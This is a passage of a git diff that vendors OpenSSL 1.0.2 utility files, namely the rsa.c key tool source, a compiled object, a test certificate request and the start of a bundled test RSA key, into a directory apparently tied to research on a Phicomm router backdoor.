diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/req.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/req.pem
new file mode 100644
index 0000000..5537df6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/req.pem
@@ -0,0 +1,11 @@
+-----BEGIN CERTIFICATE REQUEST-----
+MIIBlzCCAVcCAQAwXjELMAkGA1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUx
+ITAfBgNVBAoTGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDEXMBUGA1UEAxMORXJp
+YyB0aGUgWW91bmcwge8wgaYGBSsOAwIMMIGcAkEA+ZiKEvZmc9MtnaFZh4NiZ3oZ
+S4J1PHvPrm9MXj5ntVheDPkdmBDTncyaGAJcMjwsyB/GvLDGd6yGCw/8eF+09wIV
+AK3VagOxGd/Q4Af5NbxR5FB7CXEjAkA2t/q7HgVLi0KeKvcDG8BRl3wuy7bCvpjg
+tWiJc/tpvcuzeuAayH89UofjAGueKjXDADiRffvSdhrNw5dkqdqlA0QAAkEAtUSo
+84OekjitKGVjxLu0HvXck29pu+foad53vPKXAsuJdACj88BPqZ91Y9PIJf1GUh38
+CuiHWi7z3cEDfZCyCKAAMAkGBSsOAwIbBQADLwAwLAIUTg8amKVBE9oqC5B75dDQ
+Chy3LdQCFHKodGEj3LjuTzdm/RTe2KZL9Uzf
+-----END CERTIFICATE REQUEST-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsa.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsa.c
new file mode 100644
index 0000000..e13c14f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsa.c
@@ -0,0 +1,439 @@
+/* apps/rsa.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/opensslconf.h>
+#ifndef OPENSSL_NO_RSA
+# include <stdio.h>
+# include <stdlib.h>
+# include <string.h>
+# include <time.h>
+# include "apps.h"
+# include <openssl/bio.h>
+# include <openssl/err.h>
+# include <openssl/rsa.h>
+# include <openssl/evp.h>
+# include <openssl/x509.h>
+# include <openssl/pem.h>
+# include <openssl/bn.h>
+
+# undef PROG
+# define PROG    rsa_main
+
+/*-
+ * -inform arg  - input format - default PEM (one of DER, NET or PEM)
+ * -outform arg - output format - default PEM
+ * -in arg      - input file - default stdin
+ * -out arg     - output file - default stdout
+ * -des         - encrypt output if PEM format with DES in cbc mode
+ * -des3        - encrypt output if PEM format
+ * -idea        - encrypt output if PEM format
+ * -seed        - encrypt output if PEM format
+ * -aes128      - encrypt output if PEM format
+ * -aes192      - encrypt output if PEM format
+ * -aes256      - encrypt output if PEM format
+ * -camellia128 - encrypt output if PEM format
+ * -camellia192 - encrypt output if PEM format
+ * -camellia256 - encrypt output if PEM format
+ * -text        - print a text version
+ * -modulus     - print the RSA key modulus
+ * -check       - verify key consistency
+ * -pubin       - Expect a public key in input file.
+ * -pubout      - Output a public key.
+ */
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    int ret = 1;
+    RSA *rsa = NULL;
+    int i, badops = 0, sgckey = 0;
+    const EVP_CIPHER *enc = NULL;
+    BIO *out = NULL;
+    int informat, outformat, text = 0, check = 0, noout = 0;
+    int pubin = 0, pubout = 0;
+    char *infile, *outfile, *prog;
+    char *passargin = NULL, *passargout = NULL;
+    char *passin = NULL, *passout = NULL;
+# ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+# endif
+    int modulus = 0;
+
+    int pvk_encr = 2;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    infile = NULL;
+    outfile = NULL;
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    prog = argv[0];
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-passin") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargin = *(++argv);
+        } else if (strcmp(*argv, "-passout") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargout = *(++argv);
+        }
+# ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+# endif
+        else if (strcmp(*argv, "-sgckey") == 0)
+            sgckey = 1;
+        else if (strcmp(*argv, "-pubin") == 0)
+            pubin = 1;
+        else if (strcmp(*argv, "-pubout") == 0)
+            pubout = 1;
+        else if (strcmp(*argv, "-RSAPublicKey_in") == 0)
+            pubin = 2;
+        else if (strcmp(*argv, "-RSAPublicKey_out") == 0)
+            pubout = 2;
+        else if (strcmp(*argv, "-pvk-strong") == 0)
+            pvk_encr = 2;
+        else if (strcmp(*argv, "-pvk-weak") == 0)
+            pvk_encr = 1;
+        else if (strcmp(*argv, "-pvk-none") == 0)
+            pvk_encr = 0;
+        else if (strcmp(*argv, "-noout") == 0)
+            noout = 1;
+        else if (strcmp(*argv, "-text") == 0)
+            text = 1;
+        else if (strcmp(*argv, "-modulus") == 0)
+            modulus = 1;
+        else if (strcmp(*argv, "-check") == 0)
+            check = 1;
+        else if ((enc = EVP_get_cipherbyname(&(argv[0][1]))) == NULL) {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        BIO_printf(bio_err, "%s [options] <infile >outfile\n", prog);
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err,
+                   " -inform arg     input format - one of DER NET PEM\n");
+        BIO_printf(bio_err,
+                   " -outform arg    output format - one of DER NET PEM\n");
+        BIO_printf(bio_err, " -in arg         input file\n");
+        BIO_printf(bio_err, " -sgckey         Use IIS SGC key format\n");
+        BIO_printf(bio_err,
+                   " -passin arg     input file pass phrase source\n");
+        BIO_printf(bio_err, " -out arg        output file\n");
+        BIO_printf(bio_err,
+                   " -passout arg    output file pass phrase source\n");
+        BIO_printf(bio_err,
+                   " -des            encrypt PEM output with cbc des\n");
+        BIO_printf(bio_err,
+                   " -des3           encrypt PEM output with ede cbc des using 168 bit key\n");
+# ifndef OPENSSL_NO_IDEA
+        BIO_printf(bio_err,
+                   " -idea           encrypt PEM output with cbc idea\n");
+# endif
+# ifndef OPENSSL_NO_SEED
+        BIO_printf(bio_err,
+                   " -seed           encrypt PEM output with cbc seed\n");
+# endif
+# ifndef OPENSSL_NO_AES
+        BIO_printf(bio_err, " -aes128, -aes192, -aes256\n");
+        BIO_printf(bio_err,
+                   "                 encrypt PEM output with cbc aes\n");
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+        BIO_printf(bio_err, " -camellia128, -camellia192, -camellia256\n");
+        BIO_printf(bio_err,
+                   "                 encrypt PEM output with cbc camellia\n");
+# endif
+        BIO_printf(bio_err, " -text           print the key in text\n");
+        BIO_printf(bio_err, " -noout          don't print key out\n");
+        BIO_printf(bio_err, " -modulus        print the RSA key modulus\n");
+        BIO_printf(bio_err, " -check          verify key consistency\n");
+        BIO_printf(bio_err,
+                   " -pubin          expect a public key in input file\n");
+        BIO_printf(bio_err, " -pubout         output a public key\n");
+# ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   " -engine e       use engine e, possibly a hardware device.\n");
+# endif
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+
+# ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+# endif
+
+    if (!app_passwd(bio_err, passargin, passargout, &passin, &passout)) {
+        BIO_printf(bio_err, "Error getting passwords\n");
+        goto end;
+    }
+
+    if (check && pubin) {
+        BIO_printf(bio_err, "Only private keys can be checked\n");
+        goto end;
+    }
+
+    out = BIO_new(BIO_s_file());
+
+    {
+        EVP_PKEY *pkey;
+
+        if (pubin) {
+            int tmpformat = -1;
+            if (pubin == 2) {
+                if (informat == FORMAT_PEM)
+                    tmpformat = FORMAT_PEMRSA;
+                else if (informat == FORMAT_ASN1)
+                    tmpformat = FORMAT_ASN1RSA;
+            } else if (informat == FORMAT_NETSCAPE && sgckey)
+                tmpformat = FORMAT_IISSGC;
+            else
+                tmpformat = informat;
+
+            pkey = load_pubkey(bio_err, infile, tmpformat, 1,
+                               passin, e, "Public Key");
+        } else
+            pkey = load_key(bio_err, infile,
+                            (informat == FORMAT_NETSCAPE && sgckey ?
+                             FORMAT_IISSGC : informat), 1,
+                            passin, e, "Private Key");
+
+        if (pkey != NULL)
+            rsa = EVP_PKEY_get1_RSA(pkey);
+        EVP_PKEY_free(pkey);
+    }
+
+    if (rsa == NULL) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+    if (text)
+        if (!RSA_print(out, rsa, 0)) {
+            perror(outfile);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+
+    if (modulus) {
+        BIO_printf(out, "Modulus=");
+        BN_print(out, rsa->n);
+        BIO_printf(out, "\n");
+    }
+
+    if (check) {
+        int r = RSA_check_key(rsa);
+
+        if (r == 1)
+            BIO_printf(out, "RSA key ok\n");
+        else if (r == 0) {
+            unsigned long err;
+
+            while ((err = ERR_peek_error()) != 0 &&
+                   ERR_GET_LIB(err) == ERR_LIB_RSA &&
+                   ERR_GET_FUNC(err) == RSA_F_RSA_CHECK_KEY &&
+                   ERR_GET_REASON(err) != ERR_R_MALLOC_FAILURE) {
+                BIO_printf(out, "RSA key error: %s\n",
+                           ERR_reason_error_string(err));
+                ERR_get_error(); /* remove e from error stack */
+            }
+        }
+
+        if (r == -1 || ERR_peek_error() != 0) { /* should happen only if r ==
+                                                 * -1 */
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if (noout) {
+        ret = 0;
+        goto end;
+    }
+    BIO_printf(bio_err, "writing RSA key\n");
+    if (outformat == FORMAT_ASN1) {
+        if (pubout || pubin) {
+            if (pubout == 2)
+                i = i2d_RSAPublicKey_bio(out, rsa);
+            else
+                i = i2d_RSA_PUBKEY_bio(out, rsa);
+        } else
+            i = i2d_RSAPrivateKey_bio(out, rsa);
+    }
+# ifndef OPENSSL_NO_RC4
+    else if (outformat == FORMAT_NETSCAPE) {
+        unsigned char *p, *pp;
+        int size;
+
+        i = 1;
+        size = i2d_RSA_NET(rsa, NULL, NULL, sgckey);
+        if ((p = (unsigned char *)OPENSSL_malloc(size)) == NULL) {
+            BIO_printf(bio_err, "Memory allocation failure\n");
+            goto end;
+        }
+        pp = p;
+        i2d_RSA_NET(rsa, &p, NULL, sgckey);
+        BIO_write(out, (char *)pp, size);
+        OPENSSL_free(pp);
+    }
+# endif
+    else if (outformat == FORMAT_PEM) {
+        if (pubout || pubin) {
+            if (pubout == 2)
+                i = PEM_write_bio_RSAPublicKey(out, rsa);
+            else
+                i = PEM_write_bio_RSA_PUBKEY(out, rsa);
+        } else
+            i = PEM_write_bio_RSAPrivateKey(out, rsa,
+                                            enc, NULL, 0, NULL, passout);
+# if !defined(OPENSSL_NO_DSA) && !defined(OPENSSL_NO_RC4)
+    } else if (outformat == FORMAT_MSBLOB || outformat == FORMAT_PVK) {
+        EVP_PKEY *pk;
+        pk = EVP_PKEY_new();
+        EVP_PKEY_set1_RSA(pk, rsa);
+        if (outformat == FORMAT_PVK)
+            i = i2b_PVK_bio(out, pk, pvk_encr, 0, passout);
+        else if (pubin || pubout)
+            i = i2b_PublicKey_bio(out, pk);
+        else
+            i = i2b_PrivateKey_bio(out, pk);
+        EVP_PKEY_free(pk);
+# endif
+    } else {
+        BIO_printf(bio_err, "bad output format specified for outfile\n");
+        goto end;
+    }
+    if (i <= 0) {
+        BIO_printf(bio_err, "unable to write key\n");
+        ERR_print_errors(bio_err);
+    } else
+        ret = 0;
+ end:
+    if (out != NULL)
+        BIO_free_all(out);
+    if (rsa != NULL)
+        RSA_free(rsa);
+    if (passin)
+        OPENSSL_free(passin);
+    if (passout)
+        OPENSSL_free(passout);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+#else                           /* !OPENSSL_NO_RSA */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsa.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsa.o
new file mode 100644
index 0000000000000000000000000000000000000000..44c8812435dbaf23a11452738f915be97efdab8a
GIT binary patch
literal 13672
zcmeI2dvILUeaDYpw(w&m8~iAS<bqdN1Z&Y<Nk%+uw360d;gv1Rvaw^#dUtgtEn4j=
zyLXWldkR5TnjImMCX<xXNircrhY4v(nnDw%81ZyyODJw>VKSj<V`^(QJPI9Zm&f+^
z``vS-pRV@IB%S8Jo|)Zy?&o}e-}AWVKF-~}D;VBhUREYlDihnp{GOshoHOV1ZIo>j
z9<frqU-PN|4%`~pAJ`Y@+n4|Nsg+Q+H<W+>B$|XKeton*G*wwwk30EJ?~pkYI@Rgz
zK?BSjz|1+?o7jpQk@Gvd`BQRRMWy*up~)G0ZD<Pp#S^vgb@C4Qazs-UYkoj`lQT6Z
zk`NV|s(>1da!?gt3YtaO>4ZEq>e=d``Bva$1@1tjLfDd4DuPU-%3vMT$a>5`Nu}Jj
z$*osztH}ri>m^u$+sU_T?t3084^M3jO}8Kk=g-Op<}NM1RCD5&P#T&#Rvn&>S5rYC
z|3YE&V(}Fy{*hY@4X+O8e>J-w3l>#yF~;0QF&)*|$@+qKv5J~;kf~~MaAqs?mYbQl
zvGB@bOR9JYQ?(WzS){5t(FoI{1m0L0Us4(`Esf8^SeNiFl*VtA#;=sd&y~i1RT_V<
zH2x;wuIc06GCJybbk@V{u9=)d`P9WBXFAI+kY@HTp$KN!3h1#Y3<RE{?d>=zDc2Wx
z3Wi)1!bm9B4mq0pg;vaw%7;0SiGmk$ZNx5xoR@O7kn5z}lE9O=Extsvq3Ppd(P`*Z
zpSLwMWqTV#(_wFqY-V^GPGc&^F8l)o%7)Lrj(La)E$omvBi-nvmE!-0FjT+gfWWoX
zIq!dW<LUSpRtG1G_Emuoo-eZvS*L8RJZ{c}nY|e<kxpae<s0I{Q*gZx<)62sfr(;y
zZe3vFlL~uNp!l=E$z?Ff>?;EkKPwh416-L~J8|5*Lj1TIcxO%U-NKT<$%`N#nx>mT
zpf_l~_!FF&YVLLB-^2OXN_7@)AP>(%4;8ydHW(}*8e+%@3@G;YuKWv;pm_#wGRs4<
z@m=}n!ukKA^6tqqIYT-)eI*=%i~M8@T>fW2{G?b6LCv)yw_e_)%+qv-3gzE%ns-fT
zD(tO&0=sfDiM^5qQ0HAWp(%(Z-R!Gy{(_TN*rs_pod0*Fo1DQWD4A>wg>+6Oz24b}
zow!b6U#pH${vCOIx}e8~GFns`gl?R;ADX1@P!s3Nau+X>6;h$;%RwceCA*ydJGbTi
zPoG;qalSIQE0jMUdivaox?&A<;ry}O*8F*y57?%RcmtXd%0D9;MzHV~#hKhH-lN%{
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
PZb-KO812n}x#Rx_tjPRK

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsa8192.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsa8192.pem
new file mode 100644
index 0000000..946a6e5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsa8192.pem
@@ -0,0 +1,101 @@
+-----BEGIN RSA PRIVATE KEY-----
+
+MIISKAIBAAKCBAEAiQ2f1X6Bte1DKD0OoCBKEikzPW+5w3oXk3WwnE97Wxzy6wJZ
+ebbZC3CZKKBnJeBMrysPf+lK+9+fP6Vm8bp1wvbcSIA59BDrX6irFSuM/bdnkbuF
+MFlDjt+uVrxwoyqfPi2IPot1HQg3l5mdyBqcTWvbOnU2L9HZxJfPUCjfzdTMPrMY
+55/A20XL7tlV2opEfwhy3uVlveQBM0DnZ3MUQfrk+lRRNWv7yE4ScbOfER9fjvOm
+yJc3ZbOa3e+AMGGU9OqJ/fyOl0SGYyP2k23omy/idBV4uOs8QWdnAvq8UOzDdua3
+tuf5Tn17XBurPJ8juwyPBNispkwwn8BjxAZVPhwUIcxFBg339IxJ9cW0WdVy4nNA
+LWo/8Ahlf+kZNnFNGCPFytU9gGMLMhab9w/rLrwa9qNe4L8Fmu1JxONn1WfhMOKE
+aFmycf2olJsYLgUIGYZrjnYu0p/7P3yhTOv8JIhmK+SzmA/I0xiQoF84rpaQzH2d
+PvxICOA9oQSowou0gLuBSZWm6LiXirg1DZCziU46v33ErQlWM1dSyNaUSzihcV59
+mVD0nmzboXH75lGiyiZlp8cLbozzoCwvk9rYqpUGSBzbAy0ECCpabGpzO2Ug+oDi
+71e5z4WMpeoR4IS8MaOG/GsJnwaXhiB/gNYfK+8pRADVk5StEAZDE2alSuCbDs0z
+d9zYr4/em5T9VZsLetxRE7pm/Es9yELuViz8/Tm0/8MVdmNYc/xZU1t6qYYFdyQ2
+wlGDTiNPsjR8yXCkmBjKwqnuleu1X6LaZu3VPhEkXGcyFAquQUkSiMv0Yu74qAe0
+bQ2v+jjZzP6AM9LUo89cW4Kd8SGD96BdNlAVPNMXoBcIOsZBwsOtETBd4KAyvkXE
